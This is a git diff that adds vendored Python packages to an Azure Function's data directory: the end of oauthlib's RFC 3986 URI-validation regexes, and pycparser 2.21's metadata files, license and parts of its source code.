\) | + \* | \+ | , | ; | = )""" + +# pchar = unreserved / pct-encoded / sub-delims / ":" / "@" +pchar = r"(?: %(unreserved)s | %(pct_encoded)s | %(sub_delims)s | : | @ )" % locals( +) + +# reserved = gen-delims / sub-delims +reserved = r"(?: %(gen_delims)s | %(sub_delims)s )" % locals() + + +# scheme + +# scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) +scheme = r"%(ALPHA)s (?: %(ALPHA)s | %(DIGIT)s | \+ | \- | \. )*" % locals() + + +# authority + +# dec-octet = DIGIT ; 0-9 +# / %x31-39 DIGIT ; 10-99 +# / "1" 2DIGIT ; 100-199 +# / "2" %x30-34 DIGIT ; 200-249 +# / "25" %x30-35 ; 250-255 +dec_octet = r"""(?: %(DIGIT)s | + [\x31-\x39] %(DIGIT)s | + 1 %(DIGIT)s{2} | + 2 [\x30-\x34] %(DIGIT)s | + 25 [\x30-\x35] + ) +""" % locals() + +# IPv4address = dec-octet "." dec-octet "." dec-octet "." dec-octet +IPv4address = r"%(dec_octet)s \. %(dec_octet)s \. %(dec_octet)s \. %(dec_octet)s" % locals( +) + +# IPv6address +IPv6address = r"([A-Fa-f0-9:]+:+)+[A-Fa-f0-9]+" + +# IPvFuture = "v" 1*HEXDIG "." 
1*( unreserved / sub-delims / ":" ) +IPvFuture = r"v %(HEXDIG)s+ \. (?: %(unreserved)s | %(sub_delims)s | : )+" % locals() + +# IP-literal = "[" ( IPv6address / IPvFuture ) "]" +IP_literal = r"\[ (?: %(IPv6address)s | %(IPvFuture)s ) \]" % locals() + +# reg-name = *( unreserved / pct-encoded / sub-delims ) +reg_name = r"(?: %(unreserved)s | %(pct_encoded)s | %(sub_delims)s )*" % locals() + +# userinfo = *( unreserved / pct-encoded / sub-delims / ":" ) +userinfo = r"(?: %(unreserved)s | %(pct_encoded)s | %(sub_delims)s | : )" % locals( +) + +# host = IP-literal / IPv4address / reg-name +host = r"(?: %(IP_literal)s | %(IPv4address)s | %(reg_name)s )" % locals() + +# port = *DIGIT +port = r"(?: %(DIGIT)s )*" % locals() + +# authority = [ userinfo "@" ] host [ ":" port ] +authority = r"(?: %(userinfo)s @)? %(host)s (?: : %(port)s)?" % locals() + +# Path + +# segment = *pchar +segment = r"%(pchar)s*" % locals() + +# segment-nz = 1*pchar +segment_nz = r"%(pchar)s+" % locals() + +# segment-nz-nc = 1*( unreserved / pct-encoded / sub-delims / "@" ) +# ; non-zero-length segment without any colon ":" +segment_nz_nc = r"(?: %(unreserved)s | %(pct_encoded)s | %(sub_delims)s | @ )+" % locals() + +# path-abempty = *( "/" segment ) +path_abempty = r"(?: / %(segment)s )*" % locals() + +# path-absolute = "/" [ segment-nz *( "/" segment ) ] +path_absolute = r"/ (?: %(segment_nz)s (?: / %(segment)s )* )?" % locals() + +# path-noscheme = segment-nz-nc *( "/" segment ) +path_noscheme = r"%(segment_nz_nc)s (?: / %(segment)s )*" % locals() + +# path-rootless = segment-nz *( "/" segment ) +path_rootless = r"%(segment_nz)s (?: / %(segment)s )*" % locals() + +# path-empty = 0 +path_empty = r"" # FIXME + +# path = path-abempty ; begins with "/" or is empty +# / path-absolute ; begins with "/" but not "//" +# / path-noscheme ; begins with a non-colon segment +# / path-rootless ; begins with a segment +# / path-empty ; zero characters +path = r"""(?: %(path_abempty)s | + %(path_absolute)s | + %(path_noscheme)s | + %(path_rootless)s | + %(path_empty)s + ) +""" % locals() + +### Query and Fragment + +# query = *( pchar / "/" / "?" ) +query = r"(?: %(pchar)s | / | \? )*" % locals() + +# fragment = *( pchar / "/" / "?" ) +fragment = r"(?: %(pchar)s | / | \? )*" % locals() + +# URIs + +# hier-part = "//" authority path-abempty +# / path-absolute +# / path-rootless +# / path-empty +hier_part = r"""(?: (?: // %(authority)s %(path_abempty)s ) | + %(path_absolute)s | + %(path_rootless)s | + %(path_empty)s + ) +""" % locals() + +# relative-part = "//" authority path-abempty +# / path-absolute +# / path-noscheme +# / path-empty +relative_part = r"""(?: (?: // %(authority)s %(path_abempty)s ) | + %(path_absolute)s | + %(path_noscheme)s | + %(path_empty)s + ) +""" % locals() + +# relative-ref = relative-part [ "?" query ] [ "#" fragment ] +relative_ref = r"%(relative_part)s (?: \? %(query)s)? (?: \# %(fragment)s)?" % locals( +) + +# URI = scheme ":" hier-part [ "?" query ] [ "#" fragment ] +URI = r"^(?: %(scheme)s : %(hier_part)s (?: \? %(query)s )? (?: \# %(fragment)s )? )$" % locals( +) + +# URI-reference = URI / relative-ref +URI_reference = r"^(?: %(URI)s | %(relative_ref)s )$" % locals() + +# absolute-URI = scheme ":" hier-part [ "?" query ] +absolute_URI = r"^(?: %(scheme)s : %(hier_part)s (?: \? %(query)s )? 
)$" % locals( +) + + +def is_uri(uri): + return re.match(URI, uri, re.VERBOSE) + + +def is_uri_reference(uri): + return re.match(URI_reference, uri, re.VERBOSE) + + +def is_absolute_uri(uri): + return re.match(absolute_URI, uri, re.VERBOSE) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/LICENSE new file mode 100644 index 0000000..de06a37 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/LICENSE @@ -0,0 +1,27 @@ +pycparser -- A C parser in Python + +Copyright (c) 2008-2020, Eli Bendersky +All rights reserved. + +Redistribution and use in source and binary forms, with or without modification, +are permitted provided that the following conditions are met: + +* Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. +* Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. +* Neither the name of Eli Bendersky nor the names of its contributors may + be used to endorse or promote products derived from this software without + specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE +LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE +GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT +LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT +OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
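As a quick sanity check of the RFC 3986 helpers defined in oauthlib/uri_validate.py above, the three predicates can be exercised directly; a hedged sketch (the URIs are arbitrary examples, and each call returns a match object or None):

    from oauthlib.uri_validate import is_absolute_uri, is_uri, is_uri_reference

    assert is_uri('https://example.com/cb?code=42')    # full URI with scheme
    assert is_absolute_uri('https://example.com/cb')   # absolute-URI: no fragment allowed
    assert is_uri_reference('/relative/path')          # relative references also match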
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/METADATA new file mode 100644 index 0000000..8df7783 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/METADATA @@ -0,0 +1,31 @@ +Metadata-Version: 2.1 +Name: pycparser +Version: 2.21 +Summary: C parser in Python +Home-page: https://github.com/eliben/pycparser +Author: Eli Bendersky +Author-email: eliben@gmail.com +Maintainer: Eli Bendersky +License: BSD +Platform: Cross Platform +Classifier: Development Status :: 5 - Production/Stable +Classifier: License :: OSI Approved :: BSD License +Classifier: Programming Language :: Python :: 2 +Classifier: Programming Language :: Python :: 2.7 +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.4 +Classifier: Programming Language :: Python :: 3.5 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Requires-Python: >=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.* + + +pycparser is a complete parser of the C language, written in +pure Python using the PLY parsing library. +It parses C code into an AST and can serve as a front-end for +C compilers or analysis tools. + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/RECORD new file mode 100644 index 0000000..e230498 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/RECORD @@ -0,0 +1,41 @@ +pycparser-2.21.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +pycparser-2.21.dist-info/LICENSE,sha256=Pn3yW437ZYyakVAZMNTZQ7BQh6g0fH4rQyVhavU1BHs,1536 +pycparser-2.21.dist-info/METADATA,sha256=GvTEQA9yKj0nvP4mknfoGpMvjaJXCQjQANcQHrRrAxc,1108 +pycparser-2.21.dist-info/RECORD,, +pycparser-2.21.dist-info/WHEEL,sha256=kGT74LWyRUZrL4VgLh6_g12IeVl_9u9ZVhadrgXZUEY,110 +pycparser-2.21.dist-info/top_level.txt,sha256=c-lPcS74L_8KoH7IE6PQF5ofyirRQNV4VhkbSFIPeWM,10 +pycparser/__init__.py,sha256=WUEp5D0fuHBH9Q8c1fYvR2eKWfj-CNghLf2MMlQLI1I,2815 +pycparser/__pycache__/__init__.cpython-39.pyc,, +pycparser/__pycache__/_ast_gen.cpython-39.pyc,, +pycparser/__pycache__/_build_tables.cpython-39.pyc,, +pycparser/__pycache__/ast_transforms.cpython-39.pyc,, +pycparser/__pycache__/c_ast.cpython-39.pyc,, +pycparser/__pycache__/c_generator.cpython-39.pyc,, +pycparser/__pycache__/c_lexer.cpython-39.pyc,, +pycparser/__pycache__/c_parser.cpython-39.pyc,, +pycparser/__pycache__/lextab.cpython-39.pyc,, +pycparser/__pycache__/plyparser.cpython-39.pyc,, +pycparser/__pycache__/yacctab.cpython-39.pyc,, +pycparser/_ast_gen.py,sha256=0JRVnDW-Jw-3IjVlo8je9rbAcp6Ko7toHAnB5zi7h0Q,10555 +pycparser/_build_tables.py,sha256=oZCd3Plhq-vkV-QuEsaahcf-jUI6-HgKsrAL9gvFzuU,1039 +pycparser/_c_ast.cfg,sha256=ld5ezE9yzIJFIVAUfw7ezJSlMi4nXKNCzfmqjOyQTNo,4255 +pycparser/ast_transforms.py,sha256=GTMYlUgWmXd5wJVyovXY1qzzAqjxzCpVVg0664dKGBs,5691 +pycparser/c_ast.py,sha256=HWeOrfYdCY0u5XaYhE1i60uVyE3yMWdcxzECUX-DqJw,31445 
+pycparser/c_generator.py,sha256=yi6Mcqxv88J5ue8k5-mVGxh3iJ37iD4QyF-sWcGjC-8,17772 +pycparser/c_lexer.py,sha256=xCpjIb6vOUebBJpdifidb08y7XgAsO3T1gNGXJT93-w,17167 +pycparser/c_parser.py,sha256=_8y3i52bL6SUK21KmEEl0qzHxe-0eZRzjZGkWg8gQ4A,73680 +pycparser/lextab.py,sha256=fIxBAHYRC418oKF52M7xb8_KMj3K-tHx0TzZiKwxjPM,8504 +pycparser/ply/__init__.py,sha256=q4s86QwRsYRa20L9ueSxfh-hPihpftBjDOvYa2_SS2Y,102 +pycparser/ply/__pycache__/__init__.cpython-39.pyc,, +pycparser/ply/__pycache__/cpp.cpython-39.pyc,, +pycparser/ply/__pycache__/ctokens.cpython-39.pyc,, +pycparser/ply/__pycache__/lex.cpython-39.pyc,, +pycparser/ply/__pycache__/yacc.cpython-39.pyc,, +pycparser/ply/__pycache__/ygen.cpython-39.pyc,, +pycparser/ply/cpp.py,sha256=UtC3ylTWp5_1MKA-PLCuwKQR8zSOnlGuGGIdzj8xS98,33282 +pycparser/ply/ctokens.py,sha256=MKksnN40TehPhgVfxCJhjj_BjL943apreABKYz-bl0Y,3177 +pycparser/ply/lex.py,sha256=7Qol57x702HZwjA3ZLp-84CUEWq1EehW-N67Wzghi-M,42918 +pycparser/ply/yacc.py,sha256=eatSDkRLgRr6X3-hoDk_SQQv065R0BdL2K7fQ54CgVM,137323 +pycparser/ply/ygen.py,sha256=2JYNeYtrPz1JzLSLO3d4GsS8zJU8jY_I_CR1VI9gWrA,2251 +pycparser/plyparser.py,sha256=8tLOoEytcapvWrr1JfCf7Dog-wulBtS1YrDs8S7JfMo,4875 +pycparser/yacctab.py,sha256=j_fVNIyDWDRVk7eWMqQtlBw2AwUSV5JTrtT58l7zis0,205652 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/WHEEL new file mode 100644 index 0000000..4291317 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.34.2) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/top_level.txt new file mode 100644 index 0000000..1aa9c3d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser-2.21.dist-info/top_level.txt @@ -0,0 +1 @@ +pycparser diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__init__.py new file mode 100644 index 0000000..e6367c6 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__init__.py @@ -0,0 +1,90 @@ +#----------------------------------------------------------------- +# pycparser: __init__.py +# +# This package file exports some convenience functions for +# interacting with pycparser +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- +__all__ = ['c_lexer', 'c_parser', 'c_ast'] +__version__ = '2.21' + +import io +from subprocess import check_output +from .c_parser import CParser + + +def preprocess_file(filename, cpp_path='cpp', cpp_args=''): + """ Preprocess a file using cpp. + + filename: + Name of the file you want to preprocess. + + cpp_path: + cpp_args: + Refer to the documentation of parse_file for the meaning of these + arguments. + + When successful, returns the preprocessed file's contents. + Errors from cpp will be printed out. 
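+
+        Example (hedged; assumes a working `cpp` binary on PATH and an
+        existing file, both hypothetical here):
+
+            text = preprocess_file('main.c', cpp_args=r'-Ifake_libc_include')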
+ """ + path_list = [cpp_path] + if isinstance(cpp_args, list): + path_list += cpp_args + elif cpp_args != '': + path_list += [cpp_args] + path_list += [filename] + + try: + # Note the use of universal_newlines to treat all newlines + # as \n for Python's purpose + text = check_output(path_list, universal_newlines=True) + except OSError as e: + raise RuntimeError("Unable to invoke 'cpp'. " + + 'Make sure its path was passed correctly\n' + + ('Original error: %s' % e)) + + return text + + +def parse_file(filename, use_cpp=False, cpp_path='cpp', cpp_args='', + parser=None): + """ Parse a C file using pycparser. + + filename: + Name of the file you want to parse. + + use_cpp: + Set to True if you want to execute the C pre-processor + on the file prior to parsing it. + + cpp_path: + If use_cpp is True, this is the path to 'cpp' on your + system. If no path is provided, it attempts to just + execute 'cpp', so it must be in your PATH. + + cpp_args: + If use_cpp is True, set this to the command line arguments strings + to cpp. Be careful with quotes - it's best to pass a raw string + (r'') here. For example: + r'-I../utils/fake_libc_include' + If several arguments are required, pass a list of strings. + + parser: + Optional parser object to be used instead of the default CParser + + When successful, an AST is returned. ParseError can be + thrown if the file doesn't parse successfully. + + Errors from cpp will be printed out. + """ + if use_cpp: + text = preprocess_file(filename, cpp_path, cpp_args) + else: + with io.open(filename) as f: + text = f.read() + + if parser is None: + parser = CParser() + return parser.parse(text, filename) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..8f15b61 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/_ast_gen.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/_ast_gen.cpython-39.pyc new file mode 100644 index 0000000..599c96e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/_ast_gen.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/_build_tables.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/_build_tables.cpython-39.pyc new file mode 100644 index 0000000..a8a81de Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/_build_tables.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/ast_transforms.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/ast_transforms.cpython-39.pyc new file mode 100644 index 0000000..dfcff6c Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/ast_transforms.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_ast.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_ast.cpython-39.pyc new file mode 100644 index 0000000..2144cf3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_ast.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_generator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_generator.cpython-39.pyc new file mode 100644 index 0000000..9a715cb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_generator.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_lexer.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_lexer.cpython-39.pyc new file mode 100644 index 0000000..5b732d3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_lexer.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_parser.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_parser.cpython-39.pyc new file mode 100644 index 0000000..156d3ad Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/c_parser.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/lextab.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/lextab.cpython-39.pyc new file mode 100644 index 0000000..36aaf37 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/lextab.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/plyparser.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/plyparser.cpython-39.pyc new file mode 100644 index 0000000..9d3bc75 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/plyparser.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/yacctab.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/yacctab.cpython-39.pyc new file mode 100644 index 0000000..d6f7e6e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/__pycache__/yacctab.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_ast_gen.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_ast_gen.py new file mode 100644 index 0000000..b028098 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/_ast_gen.py @@ -0,0 +1,336 @@ +#----------------------------------------------------------------- +# _ast_gen.py +# +# Generates the AST Node classes from a specification given in +# a configuration file +# +# The design of this module was inspired by astgen.py from the +# Python 2.5 code-base. +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- +from string import Template + + +class ASTCodeGenerator(object): + def __init__(self, cfg_filename='_c_ast.cfg'): + """ Initialize the code generator from a configuration + file. + """ + self.cfg_filename = cfg_filename + self.node_cfg = [NodeCfg(name, contents) + for (name, contents) in self.parse_cfgfile(cfg_filename)] + + def generate(self, file=None): + """ Generates the code into file, an open file buffer. + """ + src = Template(_PROLOGUE_COMMENT).substitute( + cfg_filename=self.cfg_filename) + + src += _PROLOGUE_CODE + for node_cfg in self.node_cfg: + src += node_cfg.generate_source() + '\n\n' + + file.write(src) + + def parse_cfgfile(self, filename): + """ Parse the configuration file and yield pairs of + (name, contents) for each node. + """ + with open(filename, "r") as f: + for line in f: + line = line.strip() + if not line or line.startswith('#'): + continue + colon_i = line.find(':') + lbracket_i = line.find('[') + rbracket_i = line.find(']') + if colon_i < 1 or lbracket_i <= colon_i or rbracket_i <= lbracket_i: + raise RuntimeError("Invalid line in %s:\n%s\n" % (filename, line)) + + name = line[:colon_i] + val = line[lbracket_i + 1:rbracket_i] + vallist = [v.strip() for v in val.split(',')] if val else [] + yield name, vallist + + +class NodeCfg(object): + """ Node configuration. + + name: node name + contents: a list of contents - attributes and child nodes + See comment at the top of the configuration file for details. 
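+
+        For example (illustrative), the configuration entry
+
+            BinaryOp: [op, left*, right*]
+
+        yields a NodeCfg whose attr list is ['op'] and whose child list
+        is ['left', 'right']; a trailing '**' would have marked a
+        sequence child (seq_child) instead.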
+ """ + + def __init__(self, name, contents): + self.name = name + self.all_entries = [] + self.attr = [] + self.child = [] + self.seq_child = [] + + for entry in contents: + clean_entry = entry.rstrip('*') + self.all_entries.append(clean_entry) + + if entry.endswith('**'): + self.seq_child.append(clean_entry) + elif entry.endswith('*'): + self.child.append(clean_entry) + else: + self.attr.append(entry) + + def generate_source(self): + src = self._gen_init() + src += '\n' + self._gen_children() + src += '\n' + self._gen_iter() + src += '\n' + self._gen_attr_names() + return src + + def _gen_init(self): + src = "class %s(Node):\n" % self.name + + if self.all_entries: + args = ', '.join(self.all_entries) + slots = ', '.join("'{0}'".format(e) for e in self.all_entries) + slots += ", 'coord', '__weakref__'" + arglist = '(self, %s, coord=None)' % args + else: + slots = "'coord', '__weakref__'" + arglist = '(self, coord=None)' + + src += " __slots__ = (%s)\n" % slots + src += " def __init__%s:\n" % arglist + + for name in self.all_entries + ['coord']: + src += " self.%s = %s\n" % (name, name) + + return src + + def _gen_children(self): + src = ' def children(self):\n' + + if self.all_entries: + src += ' nodelist = []\n' + + for child in self.child: + src += ( + ' if self.%(child)s is not None:' + + ' nodelist.append(("%(child)s", self.%(child)s))\n') % ( + dict(child=child)) + + for seq_child in self.seq_child: + src += ( + ' for i, child in enumerate(self.%(child)s or []):\n' + ' nodelist.append(("%(child)s[%%d]" %% i, child))\n') % ( + dict(child=seq_child)) + + src += ' return tuple(nodelist)\n' + else: + src += ' return ()\n' + + return src + + def _gen_iter(self): + src = ' def __iter__(self):\n' + + if self.all_entries: + for child in self.child: + src += ( + ' if self.%(child)s is not None:\n' + + ' yield self.%(child)s\n') % (dict(child=child)) + + for seq_child in self.seq_child: + src += ( + ' for child in (self.%(child)s or []):\n' + ' yield child\n') % (dict(child=seq_child)) + + if not (self.child or self.seq_child): + # Empty generator + src += ( + ' return\n' + + ' yield\n') + else: + # Empty generator + src += ( + ' return\n' + + ' yield\n') + + return src + + def _gen_attr_names(self): + src = " attr_names = (" + ''.join("%r, " % nm for nm in self.attr) + ')' + return src + + +_PROLOGUE_COMMENT = \ +r'''#----------------------------------------------------------------- +# ** ATTENTION ** +# This code was automatically generated from the file: +# $cfg_filename +# +# Do not modify it directly. Modify the configuration file and +# run the generator again. +# ** ** *** ** ** +# +# pycparser: c_ast.py +# +# AST Node classes. +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- + +''' + +_PROLOGUE_CODE = r''' +import sys + +def _repr(obj): + """ + Get the representation of an object, with dedicated pprint-like format for lists. + """ + if isinstance(obj, list): + return '[' + (',\n '.join((_repr(e).replace('\n', '\n ') for e in obj))) + '\n]' + else: + return repr(obj) + +class Node(object): + __slots__ = () + """ Abstract base class for AST nodes. 
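+
+    For example (a hedged sketch, where `node` is any parsed pycparser
+    AST node):
+
+        for child_name, child in node.children():
+            print(child_name, type(child).__name__)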
+ """ + def __repr__(self): + """ Generates a python representation of the current node + """ + result = self.__class__.__name__ + '(' + + indent = '' + separator = '' + for name in self.__slots__[:-2]: + result += separator + result += indent + result += name + '=' + (_repr(getattr(self, name)).replace('\n', '\n ' + (' ' * (len(name) + len(self.__class__.__name__))))) + + separator = ',' + indent = '\n ' + (' ' * len(self.__class__.__name__)) + + result += indent + ')' + + return result + + def children(self): + """ A sequence of all children that are Nodes + """ + pass + + def show(self, buf=sys.stdout, offset=0, attrnames=False, nodenames=False, showcoord=False, _my_node_name=None): + """ Pretty print the Node and all its attributes and + children (recursively) to a buffer. + + buf: + Open IO buffer into which the Node is printed. + + offset: + Initial offset (amount of leading spaces) + + attrnames: + True if you want to see the attribute names in + name=value pairs. False to only see the values. + + nodenames: + True if you want to see the actual node names + within their parents. + + showcoord: + Do you want the coordinates of each Node to be + displayed. + """ + lead = ' ' * offset + if nodenames and _my_node_name is not None: + buf.write(lead + self.__class__.__name__+ ' <' + _my_node_name + '>: ') + else: + buf.write(lead + self.__class__.__name__+ ': ') + + if self.attr_names: + if attrnames: + nvlist = [(n, getattr(self,n)) for n in self.attr_names] + attrstr = ', '.join('%s=%s' % nv for nv in nvlist) + else: + vlist = [getattr(self, n) for n in self.attr_names] + attrstr = ', '.join('%s' % v for v in vlist) + buf.write(attrstr) + + if showcoord: + buf.write(' (at %s)' % self.coord) + buf.write('\n') + + for (child_name, child) in self.children(): + child.show( + buf, + offset=offset + 2, + attrnames=attrnames, + nodenames=nodenames, + showcoord=showcoord, + _my_node_name=child_name) + + +class NodeVisitor(object): + """ A base NodeVisitor class for visiting c_ast nodes. + Subclass it and define your own visit_XXX methods, where + XXX is the class name you want to visit with these + methods. + + For example: + + class ConstantVisitor(NodeVisitor): + def __init__(self): + self.values = [] + + def visit_Constant(self, node): + self.values.append(node.value) + + Creates a list of values of all the constant nodes + encountered below the given node. To use it: + + cv = ConstantVisitor() + cv.visit(node) + + Notes: + + * generic_visit() will be called for AST nodes for which + no visit_XXX method was defined. + * The children of nodes for which a visit_XXX was + defined will not be visited - if you need this, call + generic_visit() on the node. + You can use: + NodeVisitor.generic_visit(self, node) + * Modeled after Python's own AST visiting facilities + (the ast module of Python 3.0) + """ + + _method_cache = None + + def visit(self, node): + """ Visit a node. + """ + + if self._method_cache is None: + self._method_cache = {} + + visitor = self._method_cache.get(node.__class__.__name__, None) + if visitor is None: + method = 'visit_' + node.__class__.__name__ + visitor = getattr(self, method, self.generic_visit) + self._method_cache[node.__class__.__name__] = visitor + + return visitor(node) + + def generic_visit(self, node): + """ Called if no explicit visitor function exists for a + node. Implements preorder visiting of the node. 
